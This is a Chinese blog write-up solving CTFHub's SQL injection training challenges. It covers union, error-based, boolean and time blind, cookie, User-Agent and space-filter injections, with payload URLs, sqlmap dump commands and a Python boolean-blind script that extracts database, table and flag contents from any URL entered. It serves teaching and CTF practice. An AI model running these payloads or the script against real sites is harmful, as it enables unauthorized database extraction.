CTFHub闯关之SQL注入

最新推荐文章于 2024-03-26 22:07:50 发布
最新推荐文章于 2024-03-26 22:07:50 发布
阅读量3.3k 收藏 3
点赞数 2
分类专栏: sql注入 文章标签: linq c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/124530428
版权

CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。

 CTFHub 地址:CTFHub

CTFHub 是一个目前比较出名的靶场(就是题目好像少了点)(说实话,sqli-labs你学通了这几个题目只能说是放松训练了,但是这里面的历年真题有几个挺难的)

注册登录后我们点击技能树 --> web --> SQL注入

(1)整数型注入

开启靶场后,我们点击他给我们的链接,进入题目,相信看到这里的朋友都是有一定基础的了,我就从简了,如果没什么基础可以去看看我写的另外9篇SQL注入

SQL注入之sqli-labs_清丶酒孤欢ゞ的博客-CSDN博客

用校园网的朋友建议用热点,我这个用校园网的时候老是给我返回页面错误(笑)

先判断字段数

http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=1 order by 2--+
http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=1 order by 3--+

字段数为2,然后看回显位置

http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=-1 union select 1,2--+

然后在第二个回显位输出数据库名字

http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=-1 union select 1,database()--+

得知数据库名字为 sqli,然后爆表

http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+

因为我们要拿flag嘛,所以肯定看flag里面的数据了,然后我们爆表flag里面的字段

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+

然后拿数据

http://challenge-fbe52bbdc6bec92e.sandbox.ctfhub.com:10800/?id=-1 union select 1,flag from sqli.flag--+

得到一个flag

ctfhub{4572552ca7d32c6ff254eb39}

提交,成功过关

(2)字符型注入

就是单引号闭合,其他都一样

http://challenge-14fc9c6738043da4.sandbox.ctfhub.com:10800/?id=1' order by 2--+

(3)报错注入

http://challenge-b4ca420721390be6.sandbox.ctfhub.com:10800/?id=1 or updatexml(1,concat(0x7e,database()),1)--+
http://challenge-b4ca420721390be6.sandbox.ctfhub.com:10800/?id=1 or updatexml(1,concat(0x7e,mid((select flag from sqli.flag),1,31)),1)--+
http://challenge-b4ca420721390be6.sandbox.ctfhub.com:10800/?id=1 or updatexml(1,concat(0x7e,mid((select flag from sqli.flag),32,31)),1)--+

(4)布尔盲注

import requests


def get_num(i, URL, str):
    # 判断数据库名字有几位
    url = f"{URL} and length(database())={i}--+"
    re=requests.get(url)
    if str in re.text:     # 判断页面是否有返回,如果有说明语句正确
        print("数据库名字有", i, "位")
        get_database(i, URL, str)
    else:
        i += 1
        get_num(i, URL, str)


def get_database(i, URL, str):
    # 检测数据库名字
    txt = 'abcdefghijklmnopqrstuvwxyz0123456789'    # 字典,也可以自己再加
    db_name = ""
    x = 1
    for i in range(i):
        for j in txt:
            k = db_name+j
            url = f"{URL} and left((select database()),{x})='{k}'--+"
            res = requests.get(url)
            if str in res.text:
                db_name = db_name+j
                x += 1
                break
    print("数据库名字为", db_name)
    tb_num(db_name, URL, txt, str)


def tb_num(db_name, URL, txt, str):
    # 猜测数据库中的表数
    byte=bytes(db_name,'utf-8')     # 将字符串转化为字节
    db="0x"+byte.hex()          # 将字节转化为16进制并与”0x”拼接
    for i in range(1,100):    # 合理猜一下大概有多少个
        url=f"{URL} and (select count(table_name) from information_schema.tables where table_schema={db})={i}--+"
        re=requests.get(url)
        if str in re.text:
            print(f"数据库{db_name}有", i, "张表")
            tb_name(i, URL, txt, db, str)


def tb_name(i, URL, txt, db, str):
    # 猜测表名
    n = 0
    tb_list=[]
    for x in range(i):
        tb_name = ""
        for j in range(1,20):   # 先判断表名有几位
            url = f"{URL} and (select length(table_name) from information_schema.tables where table_schema={db} limit {n},1)={j}--+"
            re=requests.get(url)
            if str in re.text:
                tb_length = j
                l=1
                for p in range(tb_length):      # 再判断表名
                    for k in txt:
                        name = tb_name+k
                        url=f"{URL} and (select left((select table_name from information_schema.tables where table_schema={db} limit {n},1),{l}))='{name}'--+"
                        re=requests.get(url)
                        if str in re.text:
                            tb_name = tb_name+k
                            l += 1
                            break
                n += 1
                print(f"第{n}张表名为:{tb_name}")
                tb_list.append(tb_name)
                break
    column_num(tb_list, URL, db, str)


def column_num(tb_list, URL, db, str):
    # 猜测每张表的字段数
    column_num_list = []
    for i in tb_list:
        for j in range(30):
            url=f"{URL} and (select count(column_name) from information_schema.columns where table_name='{i}')={j}--+"
            re = requests.get(url)
            if str in re.text:
                column_num_list.append(j)
                print(f"表{i}的字段数为:{j}")
                column_num_list.append(j)
                break
    column_name(column_num_list, db, URL, tb_list, str)


def column_name(column_num_list, db, URL, tb_list, str):
    # 猜测字段名
    cl_name_list = []
    del column_num_list[::2]    # 这里是因为不知道什么原因导致里面的数据重复了一份,如果有大佬知道为什么还望指点一二
    for t in range(len(tb_list)):   # 四张表,循环4次
        x = 0
        for r in range(column_num_list[t]): # 从字段列表中取出字段数并循环相应次数
            txt = 'abcdefghijklmnopqrstuvwxyz0123456789_'
            for i in range(20):     # 猜测字段名长度,合理即可
                l = 1
                cl_name = ""
                url1 = f"{URL} and (select length(column_name) from information_schema.columns where table_name = '{tb_list[t]}' limit {x},1)={i}--+"
                res = requests.get(url1)
                if str in res.text:
                    for k in range(i):
                        for j in txt:
                            name = cl_name+j
                            url2 = f"{URL} and left((select column_name from information_schema.columns where table_name = '{tb_list[t]}' limit {x}, 1),{l})='{name}'--+"
                            re = requests.get(url2)
                            if str in re.text:
                                cl_name += j
                                l += 1
                                break
                    print(f"表{tb_list[t]}字段名有:{cl_name}")
                    x += 1
                    cl_name_list.append(cl_name)
                    break
    get_data(cl_name_list, str)


def get_data(cl_name_list, str):
    txt = 'abcdefghijklmnopqrstuvwxyz0123456789_-@{}'
    # for j in range(101):    # 猜测 users 里面 id
    #     url=f"{URL} and (select count(flag) from sqli.flag)={j}--+"
    #     re=requests.get(url)
    #     if str in re.text:
    #         data_num = j
    #         break
    # print(data_num)
    for k in range(4):
        dump_data = ''
        for l in range(1, 34):  # l表示每条数据的长度,合理范围即可
            url1 = f"{URL} and ascii(substr((select flag from sqli.flag limit {k},1),{l},1))--+"
            r = requests.get(url1)
            if str not in r.text:
                data_len = l - 1
                for x in range(1, data_len + 1):  # x表示每条数据的实际范围,作为mid截取的范围
                    for y in txt:
                        name = dump_data+y
                        url2 = f"{URL} and left((select flag from sqli.flag limit {k},1),{x})='{name}'--+"
                        r = requests.get(url2)
                        if str in r.text:
                            dump_data += y
                            break
                print(f"{i}里面的数据有:{dump_data}")
                break
    # for i in cl_name_list[12:15]:
    #     for j in range(101):    # 猜测 users 里面 id
    #         url=f"{URL} and (select count({i}) from security.users)={j}--+"
    #         re=requests.get(url)
    #         if str in re.text:
    #             data_num = j
    #             break
    #     print(data_num)
    #     for k in range(data_num):
    #         dump_data = ''
    #         for l in range(1, 21):  # l表示每条数据的长度,合理范围即可
    #             url1 = f"{URL} and ascii(substr((select {i} from security.users limit {k},1),{l},1))--+"
    #             r = requests.get(url1)
    #             if str not in r.text:
    #                 data_len = l - 1
    #                 for x in range(1, data_len + 1):  # x表示每条数据的实际范围,作为mid截取的范围
    #                     for y in txt:
    #                         name = dump_data+y
    #                         url2 = f"{URL} and left((select {i} from security.users limit {k},1),{x})='{name}'--+"
    #                         r = requests.get(url2)
    #                         if str in r.text:
    #                             dump_data += y
    #                             break
    #                 print(f"{i}里面的数据有:{dump_data}")
    #                 break


if __name__ == "__main__":
    i = 1
    URL=input("请输入你要查询的网址:")  # 注意输入的格式
    str=input("请输入要进行判断的语句(如 You are in):")
    get_num(i, URL, str)

直接用我写的一个爬虫脚本就可以了,注释部分可以删除,这个原来是写sqli-labs 时写的脚本。

也可以使用sqlmap 进行盲注

sqlmap.py -u http://challenge-b4ca420721390be6.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

(5)时间盲注

sqlmap.py -u http://challenge-e89c0f87368d2078.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

(6)MySQL结构

……其实我不太明白这题和第一关有什么区别,就是把表名和字段名改了而已

(7)cookie 注入

在hackbar或者直接在搜索框里面加 ?id=1,他让我们使用 cookie 注入,我们打开 f12,或者你也可以用burp suite、wireshark 抓包都行,我们这里直接按f12 打开开发者工具,然后点击network(网络)

 可以看到我们输入的参数在cookie里面输出了且没有任何编码,我们进行cookie注入

法一:用 ModHeader 改

ModHeader 是一个浏览器插件,对于这种头注入是很方便的,具体安装请看

SQL注入之sqli-labs(四)_清丶酒孤欢ゞ的博客-CSDN博客

Chrome下ModHeader插件的安装和使用_zuo-yiran的博客-CSDN博客_modheader插件

然后点加号 request header 选择cookie 然后

id=-1 union select 1,database()#

之后注入就是一个套路了,注意这里是# 进行注释,不能使用 --+ 来注释

法二:在开发者工具里面直接修改

在 f12 里面的console 调试工具中输入

document.cookie='id=-1 union select 1,database()#'

然后回车就是修改了cookie,之后刷新即可

(8)UA 注入(User-Agent)

法一:在 ModHeader 中注入

-1 union select 1,database()#

法二:在f12中右上角的三个点中选择 More tools ,打开里面的 network condition

 

 把里面的勾去掉,然后就可以改变 user-agent了

(9)Referer注入

这玩意好像只能通过ModHeader 来改,如果有知道的朋友还望告知

(10)过滤空格

这个是把我们的空格给过滤掉了(好像是废话……),所以我们使用 /**/ 或 %0a 来代替空格就可以了

http://challenge-5eb3220123b1336d.sandbox.ctfhub.com:10800/?id=-1/**/union/**/select/**/1,database()

其他都一样了

 

清丶酒孤欢ゞ
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTFHUB技能树SQL注入
最新发布
2401_82985722的博客
03-26 485
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Web安全之SQL注入
01-21
一、什么是SQL注入SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 二、举个简单的例子 Web页面的某个表单项需要与后端服务器进行交互,用户输入的数据通过提交之后被后端解析到SELECT查询语句的WHERE字段后面,根据
CTFHub-Web-sql注入练习
Atkx's Blog
11-15 540
目录整数型注入字符型注入 整数型注入 1.判断注入 输入1 输入?id=1 and 1=1,正常回显 输入?id=1 and 1=2,返回错误。 2.判断字段数 当?id=1 order by 2 时回显正常,当?id=1 order by 3时无回显,所以字段数为2 3.爆数据库名,当前数据库名为sqli ?id=1 and 1=2 union select 1,database() 4.爆表名,有两个表,一个是news,另外一个是flag ?id=1 and 1=2 union select
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF-web题之简单的SQL注入
qq_25046827的博客
11-24 4933
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
CTFHub——技能树——SQL注入sqlmap)
sparename的博客
12-26 6826
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
CTFshow-sqli-labs
Leo8283的博客
04-20 626
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 4970
Ctfhub解题 web SQL注入
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
Sql server之sql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
记基于ctfhubsql注入的学习
weixin_46954909的博客
02-26 611
updatexml是数据库中一个只能更新xml类型的函数,当函数里的第二个参数里有特殊符号时就会报错,因此我们可以利用其特征使数据库报错,并把我们要的数据爆出来。因此这就是报错注入,对比上面的你就可以这就是报错注入漏洞的典型情况(报错会把错误数据爆出来),确定了注入条件就可以开始了。注意:本题不知道是不是我操作的问题,在对话框输入的似乎不行,因此我是在地址栏进行注入的。输入1 能发现与整型注入就不一样了,多了一对‘ ’,那么我们就可以猜测到他应该是单引号注入。如果第2行有数据就会显示,如果没有就不会显示。
二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 307
个人CTF学习之路
CTFHub之综合练习详解
YZP16670253193的博客
11-17 737
使用%0als得到一个flag_is_here文件夹和一个index.php文件,很明显index.php并不是我们要的flag而是网页PHP源码,那么flag肯定就在flag_is_here文件夹中,但网页已经过滤了空格和flag。这里我们可以利用url地址栏来构造payload ,在url中%0a代表换行当在ping后面接上%0a便可执行下一条命令(建议使用burp抓包,因为。最后只需要CD去这个文件夹并打开flag文件就行了,在LINUX中打开文件可以用。这样就得到一个装有flag的php文件了。
CTFHUB--技能树SQL注入{字符型注入}
lulu001128的博客
12-03 734
CTFHUB--技能树SQL注入{字符型注入}解题过程
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 1937
数据库注入
2021-06-16ctfhub技能树SQL注入系列
qq_45290991的博客
06-16 312
CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注 整数型注入字符型注入报错注入布尔盲注时间盲注 整数型注入 首先输入1查看回显: 可以看到返回了SQL语句及ID和Data数据,查看列数: 1 order by 2...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值